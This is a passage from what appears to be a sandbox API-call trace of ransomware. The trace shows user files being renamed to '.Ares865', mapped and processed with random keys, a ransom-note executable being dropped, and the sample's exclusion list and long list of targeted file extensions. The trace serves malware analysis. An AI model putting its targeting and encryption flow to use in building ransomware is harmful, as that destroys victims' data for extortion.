lstrcmpiW (lpString1="ink", lpString2="dcb") returned 1 [0092.747] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop (create shortcut).DeskLink.Ares865") returned 79 [0092.747] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop (create shortcut).DeskLink" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\desktop (create shortcut).desklink"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop (create shortcut).DeskLink.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\desktop (create shortcut).desklink.ares865"), dwFlags=0x1) returned 1 [0092.748] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop (create shortcut).DeskLink.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\desktop (create shortcut).desklink.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.748] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=7) returned 1 [0092.749] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.749] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.749] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.749] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x15c [0092.753] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0092.754] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.754] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.754] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.755] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop.ini.Ares865") returned 56 [0092.755] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop.ini" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\desktop.ini"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\desktop.ini.ares865"), dwFlags=0x1) returned 1 [0092.756] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Desktop.ini.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\desktop.ini.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.756] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=558) returned 1 [0092.756] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.757] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.757] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.757] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x530, lpName=0x0) returned 0x15c [0092.759] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x530) returned 0x190000 [0092.760] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.761] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.761] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.761] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Documents.mydocs.Ares865") returned 61 [0092.761] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Documents.mydocs" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\documents.mydocs"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Documents.mydocs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\documents.mydocs.ares865"), dwFlags=0x1) returned 1 [0092.762] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Documents.mydocs.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\documents.mydocs.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.762] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=0) returned 1 [0092.762] UnmapViewOfFile (lpBaseAddress=0x0) returned 0 [0092.762] CloseHandle (hObject=0x0) returned 0 [0092.762] CloseHandle (hObject=0x118) returned 1 [0092.762] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x28d97bc0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d97bc0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x3d802e42, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x4d6, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="Fax Recipient.lnk", cAlternateFileName="FAXREC~1.LNK")) returned 1 [0092.762] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.762] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="aoldtz.exe") returned 1 [0092.762] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".") returned 1 [0092.762] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="..") returned 1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="windows") returned -1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="bootmgr") returned 1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="temp") returned -1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="pagefile.sys") returned -1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="boot") returned 1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ids.txt") returned -1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="ntuser.dat") returned -1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="perflogs") returned -1 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2="MSBuild") returned -1 [0092.763] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0092.763] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Documents.mydocs") returned 53 [0092.763] lstrcpyW (in: lpString1=0x2cce44a, lpString2="Fax Recipient.lnk" | out: lpString1="Fax Recipient.lnk") returned="Fax Recipient.lnk" [0092.763] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0092.763] lstrlenW (lpString="Ares865") returned 7 [0092.763] lstrcmpiW (lpString1="ent.lnk", lpString2="Ares865") returned 1 [0092.763] lstrlenW (lpString=".dll") returned 4 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".dll") returned 1 [0092.763] lstrlenW (lpString=".lnk") returned 4 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".lnk") returned 1 [0092.763] lstrlenW (lpString=".ini") returned 4 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".ini") returned 1 [0092.763] lstrlenW (lpString=".sys") returned 4 [0092.763] lstrcmpiW (lpString1="Fax Recipient.lnk", lpString2=".sys") returned 1 [0092.763] lstrlenW (lpString="Fax Recipient.lnk") returned 17 [0092.763] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Fax Recipient.lnk.Ares865") returned 62 [0092.763] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Fax Recipient.lnk" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\fax recipient.lnk"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Fax Recipient.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\fax recipient.lnk.ares865"), dwFlags=0x1) returned 1 [0092.764] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Fax Recipient.lnk.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\fax recipient.lnk.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.764] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=1238) returned 1 [0092.765] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.765] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.765] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.765] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x7e0, lpName=0x0) returned 0x15c [0092.767] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x7e0) returned 0x190000 [0092.767] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.769] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.769] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.769] wsprintfW (in: param_1=0x2ccd198, param_2="%s.%s" | out: param_1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Mail Recipient.MAPIMail.Ares865") returned 68 [0092.769] MoveFileExW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Mail Recipient.MAPIMail" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\mail recipient.mapimail"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Mail Recipient.MAPIMail.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\mail recipient.mapimail.ares865"), dwFlags=0x1) returned 1 [0092.770] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\SendTo\\Mail Recipient.MAPIMail.Ares865" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\sendto\\mail recipient.mapimail.ares865"), dwDesiredAccess=0xc00e0000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8a000080, hTemplateFile=0x0) returned 0x118 [0092.770] GetFileSizeEx (in: hFile=0x118, lpFileSize=0x2cce090 | out: lpFileSize=0x2cce090*=4) returned 1 [0092.771] CryptAcquireContextW (in: phProv=0x2ccce54, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce54*=0x2f0518) returned 1 [0092.771] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce68 | out: pbBuffer=0x2ccce68) returned 1 [0092.771] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.772] CreateFileMappingW (hFile=0x118, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x310, lpName=0x0) returned 0x15c [0092.777] MapViewOfFile (hFileMappingObject=0x15c, dwDesiredAccess=0x6, dwFileOffsetHigh=0x0, dwFileOffsetLow=0x0, dwNumberOfBytesToMap=0x310) returned 0x190000 [0092.778] CryptAcquireContextW (in: phProv=0x2ccce04, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x2ccce04*=0x2f0518) returned 1 [0092.778] CryptGenRandom (in: hProv=0x2f0518, dwLen=0x80, pbBuffer=0x2ccce18 | out: pbBuffer=0x2ccce18) returned 1 [0092.778] CryptReleaseContext (hProv=0x2f0518, dwFlags=0x0) returned 1 [0092.779] lstrcpynW (in: lpString1=0x2cce400, lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches", iMaxLength=260 | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0092.779] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2edc10 | out: hHeap=0x2b0000) returned 1 [0092.779] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x2e7788 | out: hHeap=0x2b0000) returned 1 [0092.779] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned 38 [0092.779] lstrcatW (in: lpString1="", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" | out: lpString1="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches") returned="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches" [0092.779] lstrcatW (in: lpString1="", lpString2="HOW TO BACK YOUR FILES.exe" | out: lpString1="HOW TO BACK YOUR FILES.exe") returned="HOW TO BACK YOUR FILES.exe" [0092.779] CopyFileW (lpExistingFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\searches\\how to back your files.exe"), bFailIfExists=1) returned 0 [0092.780] CreateFileW (lpFileName="C:\\ProgramData\\HOW TO BACK YOUR FILES.exe" (normalized: "c:\\programdata\\how to back your files.exe"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0092.780] GetLastError () returned 0x0 [0092.780] RtlAllocateHeap (HeapHandle=0x2b0000, Flags=0x8, Size=0x1dc00) returned 0x33afb0 [0092.780] ReadFile (in: hFile=0x120, lpBuffer=0x33afb0, nNumberOfBytesToRead=0x1dc00, lpNumberOfBytesRead=0x2cce0dc, lpOverlapped=0x0 | out: lpBuffer=0x33afb0*, lpNumberOfBytesRead=0x2cce0dc*=0x1dc00, lpOverlapped=0x0) returned 1 [0092.780] CloseHandle (hObject=0x120) returned 1 [0092.780] HeapFree (in: hHeap=0x2b0000, dwFlags=0x0, lpMem=0x33afb0 | out: hHeap=0x2b0000) returned 1 [0092.780] lstrcatW (in: lpString1="", lpString2="\\*" | out: lpString1="\\*") returned="\\*" [0092.780] FindFirstFileW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*", lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x2ccde8 [0092.780] lstrcmpiW (lpString1=".", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.780] lstrcmpiW (lpString1=".", lpString2="aoldtz.exe") returned -1 [0092.780] lstrcmpiW (lpString1=".", lpString2=".") returned 0 [0092.780] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x28cd94e0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x4d111ec0, ftLastAccessTime.dwHighDateTime=0x1d56a3b, ftLastWriteTime.dwLowDateTime=0x4d111ec0, ftLastWriteTime.dwHighDateTime=0x1d56a3b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0092.780] lstrcmpiW (lpString1="..", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.780] lstrcmpiW (lpString1="..", lpString2="aoldtz.exe") returned -1 [0092.780] lstrcmpiW (lpString1="..", lpString2=".") returned 1 [0092.780] lstrcmpiW (lpString1="..", lpString2="..") returned 0 [0092.781] FindNextFileW (in: hFindFile=0x2ccde8, lpFindFileData=0x2cce1b0 | out: lpFindFileData=0x2cce1b0*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x28d257a0, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x28d257a0, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x2d1e12e0, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x20c, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="HOW TO BACK YOUR FILES.exe") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="aoldtz.exe") returned 1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2=".") returned 1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="..") returned 1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="windows") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="bootmgr") returned 1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="temp") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="pagefile.sys") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="boot") returned 1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="ids.txt") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="ntuser.dat") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="perflogs") returned -1 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2="MSBuild") returned -1 [0092.781] lstrlenW (lpString="desktop.ini") returned 11 [0092.781] lstrlenW (lpString="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Searches\\*") returned 40 [0092.781] lstrcpyW (in: lpString1=0x2cce44e, lpString2="desktop.ini" | out: lpString1="desktop.ini") returned="desktop.ini" [0092.781] lstrlenW (lpString="desktop.ini") returned 11 [0092.781] lstrlenW (lpString="Ares865") returned 7 [0092.781] lstrcmpiW (lpString1="top.ini", lpString2="Ares865") returned 1 [0092.781] lstrlenW (lpString=".dll") returned 4 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2=".dll") returned 1 [0092.781] lstrlenW (lpString=".lnk") returned 4 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2=".lnk") returned 1 [0092.781] lstrlenW (lpString=".ini") returned 4 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2=".ini") returned 1 [0092.781] lstrlenW (lpString=".sys") returned 4 [0092.781] lstrcmpiW (lpString1="desktop.ini", lpString2=".sys") returned 1 [0092.781] lstrlenW (lpString="desktop.ini") returned 11 [0092.781] lstrlenW (lpString="bak") returned 3 [0092.781] lstrcmpiW (lpString1="ini", lpString2="bak") returned 1 [0092.781] lstrlenW (lpString="ba_") returned 3 [0092.781] lstrcmpiW (lpString1="ini", lpString2="ba_") returned 1 [0092.781] lstrlenW (lpString="dbb") returned 3 [0092.781] lstrcmpiW (lpString1="ini", lpString2="dbb") returned 1 [0092.781] lstrlenW (lpString="vmdk") returned 4 [0092.782] lstrcmpiW (lpString1=".ini", lpString2="vmdk") returned -1 [0092.782] lstrlenW (lpString="rar") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="rar") returned -1 [0092.782] lstrlenW (lpString="zip") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="zip") returned -1 [0092.782] lstrlenW (lpString="tgz") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="tgz") returned -1 [0092.782] lstrlenW (lpString="vbox") returned 4 [0092.782] lstrcmpiW (lpString1=".ini", lpString2="vbox") returned -1 [0092.782] lstrlenW (lpString="vdi") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="vdi") returned -1 [0092.782] lstrlenW (lpString="vhd") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="vhd") returned -1 [0092.782] lstrlenW (lpString="vhdx") returned 4 [0092.782] lstrcmpiW (lpString1=".ini", lpString2="vhdx") returned -1 [0092.782] lstrlenW (lpString="avhd") returned 4 [0092.782] lstrcmpiW (lpString1=".ini", lpString2="avhd") returned -1 [0092.782] lstrlenW (lpString="db") returned 2 [0092.782] lstrcmpiW (lpString1="ni", lpString2="db") returned 1 [0092.782] lstrlenW (lpString="db2") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="db2") returned 1 [0092.782] lstrlenW (lpString="db3") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="db3") returned 1 [0092.782] lstrlenW (lpString="dbf") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="dbf") returned 1 [0092.782] lstrlenW (lpString="mdf") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="mdf") returned -1 [0092.782] lstrlenW (lpString="mdb") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="mdb") returned -1 [0092.782] lstrlenW (lpString="sql") returned 3 [0092.782] lstrcmpiW (lpString1="ini", lpString2="sql") returned -1 [0092.782] lstrlenW (lpString="sqlite") returned 6 [0092.782] lstrcmpiW (lpString1="op.ini", lpString2="sqlite") returned -1 [0092.782] lstrlenW (lpString="sqlite3") returned 7 [0092.782] lstrcmpiW (lpString1="top.ini", lpString2="sqlite3") returned 1 [0092.782] lstrlenW (lpString="sqlitedb") returned 8 [0092.782] lstrcmpiW (lpString1="ktop.ini", lpString2="sqlitedb") returned -1 [0092.782] lstrlenW (lpString="xml") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="xml") returned -1 [0092.783] lstrlenW (lpString="$er") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="$er") returned 1 [0092.783] lstrlenW (lpString="4dd") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="4dd") returned 1 [0092.783] lstrlenW (lpString="4dl") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="4dl") returned 1 [0092.783] lstrlenW (lpString="^^^") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="^^^") returned 1 [0092.783] lstrlenW (lpString="abs") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="abs") returned 1 [0092.783] lstrlenW (lpString="abx") returned 3 [0092.783] lstrcmpiW (lpString1="ini", lpString2="abx") returned 1 [0092.783] lstrlenW (lpString="accdb") returned 5 [0092.783] lstrcmpiW (lpString1="p.ini", lpString2="accdb") returned 1 [0092.783] lstrlenW (lpString="accdc") returned 5 [0092.783] lstrcmpiW (lpString1="p.ini", lpString2="accdc") returned 1 [0092.783] lstrlenW (lpString="accde") returned 5 [0092.783] lstrcmpiW (lpString1="p.ini", lpString2="accde") returned 1 [0092.783] lstrlenW (lpString="accdr") returned 5 [0092.783] lstrcmpiW (lpString1="p.ini", lpString2="accdr") returned 1 [0092.783] lstrlenW (lpString="accdt") returned 5 [0092.783] lstrcmpiW (lpString1="p.ini", lpString2="accdt") returned 1 [0092.783] lstrlenW (lpString="accdw") returned 5 [0092.783] lstrcmpiW (lpString1="p.ini", lpString2="accdw") returned 1 [0092.784] lstrlenW (lpString="accft") returned 5 [0092.784] lstrcmpiW (lpString1="p.ini", lpString2="accft") returned 1 [0092.784] lstrlenW (lpString="adb") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.784] lstrlenW (lpString="adb") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="adb") returned 1 [0092.784] lstrlenW (lpString="ade") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="ade") returned 1 [0092.784] lstrlenW (lpString="adf") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="adf") returned 1 [0092.784] lstrlenW (lpString="adn") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="adn") returned 1 [0092.784] lstrlenW (lpString="adp") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="adp") returned 1 [0092.784] lstrlenW (lpString="alf") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="alf") returned 1 [0092.784] lstrlenW (lpString="ask") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="ask") returned 1 [0092.784] lstrlenW (lpString="btr") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="btr") returned 1 [0092.784] lstrlenW (lpString="cat") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="cat") returned 1 [0092.784] lstrlenW (lpString="cdb") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="cdb") returned 1 [0092.784] lstrlenW (lpString="ckp") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="ckp") returned 1 [0092.784] lstrlenW (lpString="cma") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="cma") returned 1 [0092.784] lstrlenW (lpString="cpd") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="cpd") returned 1 [0092.784] lstrlenW (lpString="dacpac") returned 6 [0092.784] lstrcmpiW (lpString1="op.ini", lpString2="dacpac") returned 1 [0092.784] lstrlenW (lpString="dad") returned 3 [0092.784] lstrcmpiW (lpString1="ini", lpString2="dad") returned 1 [0092.784] lstrlenW (lpString="dadiagrams") returned 10 [0092.784] lstrcmpiW (lpString1="esktop.ini", lpString2="dadiagrams") returned 1 [0092.784] lstrlenW (lpString="daschema") returned 8 [0092.784] lstrcmpiW (lpString1="ktop.ini", lpString2="daschema") returned 1 [0092.785] lstrlenW (lpString="db-journal") returned 10 [0092.785] lstrcmpiW (lpString1="esktop.ini", lpString2="db-journal") returned 1 [0092.785] lstrlenW (lpString="db-shm") returned 6 [0092.785] lstrcmpiW (lpString1="op.ini", lpString2="db-shm") returned 1 [0092.785] lstrlenW (lpString="db-wal") returned 6 [0092.785] lstrcmpiW (lpString1="op.ini", lpString2="db-wal") returned 1 [0092.785] lstrlenW (lpString="dbc") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dbc") returned 1 [0092.785] lstrlenW (lpString="dbs") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dbs") returned 1 [0092.785] lstrlenW (lpString="dbt") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dbt") returned 1 [0092.785] lstrlenW (lpString="dbv") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dbv") returned 1 [0092.785] lstrlenW (lpString="dbx") returned 3 [0092.785] lstrcmpiW (lpString1="ini", lpString2="dbx") returned 1 [0092.785] lstrlenW 